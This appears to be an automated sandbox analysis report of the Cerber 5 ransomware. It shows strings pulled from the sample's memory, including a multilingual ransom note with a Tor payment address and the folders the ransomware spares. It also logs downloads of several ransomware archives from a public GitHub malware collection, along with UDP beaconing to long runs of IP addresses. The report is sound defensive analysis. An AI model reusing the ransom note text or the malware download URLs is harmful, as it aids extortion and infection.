Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: how to decrypt your files. \n\n If you cannot find any (_R_E_A_D___T_H_I_S_) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
Source: Endermanch@Cerber5.exe, 00000013.00000003.353550421.00000000063DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://{TOR}.onion/{PC_ID}
Source: Endermanch@Cerber5.exe, 00000013.00000002.472553764.00000000063C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>type or copy the add<span class="h">LU</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in this browser address bar;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br></li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>typ of kopieer het a<span class="h">fEIb6Ps</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in de adresbalk van uw browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> dans cette barre d
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> in diese Browser-Adressleiste;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nella barra degli indirizzi di questo browser;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> do paska adresu przegl
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> nesta barra de endere
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br> en la barra de direcciones de este navegador;</li>
Source: Endermanch@Cerber5.exe, 00000013.00000003.352719968.00000000063E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/12F2-EF4B-B826-0098-BE1F</span><br>

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
Source: global traffic	HTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com

Source: Joe Sandbox View	IP Address: 87.98.177.219 87.98.177.219
Source: Joe Sandbox View	IP Address: 87.98.177.218 87.98.177.218
Source: Joe Sandbox View	IP Address: 87.98.177.215 87.98.177.215

Source: global traffic	TCP traffic: 192.168.2.6:49737 -> 23.50.106.206:139
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.0:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.1:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.2:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.3:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.4:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.5:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.6:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.7:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.8:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.9:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.10:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.11:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.12:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.13:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.14:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.15:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.16:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.17:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.18:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.19:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.20:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.21:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.22:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.23:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.24:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.25:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.26:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.27:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.28:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.29:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.30:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 93.107.12.31:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.0:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.1:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.2:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.3:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.4:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.5:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.6:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.7:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.8:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.10:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.11:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.12:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.13:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.14:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.9:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.15:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.16:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.17:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.18:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.19:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.20:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.21:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.22:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.23:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.24:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.25:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.26:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.27:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.28:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.29:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.30:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 95.1.200.31:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.0:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.1:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.2:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.3:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.4:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.5:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.6:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.7:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.8:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.9:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.10:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.11:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.12:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.13:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.14:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.15:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.16:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.17:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.18:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.19:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.20:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.21:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.22:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.23:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.24:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.25:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.26:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.28:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.27:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.29:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.30:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.31:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.32:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.33:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.34:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.35:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.36:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.38:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.37:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.39:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.40:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.41:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.42:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.43:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.44:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.45:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.46:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.47:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.48:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.49:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.50:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.51:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.52:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.53:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.54:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.55:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.56:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.57:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.58:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.59:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.60:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.61:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.62:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.63:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.64:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.65:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.66:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.67:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.68:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.70:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.69:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.71:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.72:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.73:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.74:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.75:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.76:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.77:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.78:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.79:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.80:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.81:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.82:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.83:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.84:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.85:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.86:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.87:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.88:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.89:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.90:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.91:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.92:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.93:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.94:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.95:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.96:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.97:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.98:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.99:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.100:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.101:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.102:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.103:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.104:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.105:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.107:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.108:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.106:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.109:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.110:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.111:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.112:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.113:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.114:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.115:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.116:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.117:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.118:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.119:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.120:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.121:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.122:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.123:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.124:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.125:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.126:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.127:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.128:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.129:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.130:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.131:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.132:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.133:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.134:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.135:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.137:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.136:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.138:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.139:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.140:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.141:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.142:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.143:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.144:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.145:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.146:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.147:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.148:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.149:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.150:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.151:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.152:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.154:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.153:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.155:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.156:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.157:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.158:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.159:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.160:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.161:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.162:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.163:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.164:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.165:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.166:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.167:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.168:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.169:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.170:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.171:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.172:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.173:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.174:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.175:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.176:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.177:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.178:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.179:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.180:6893
Source: global traffic	UDP traffic: 192.168.2.6:59083 -> 87.98.176.181:6893
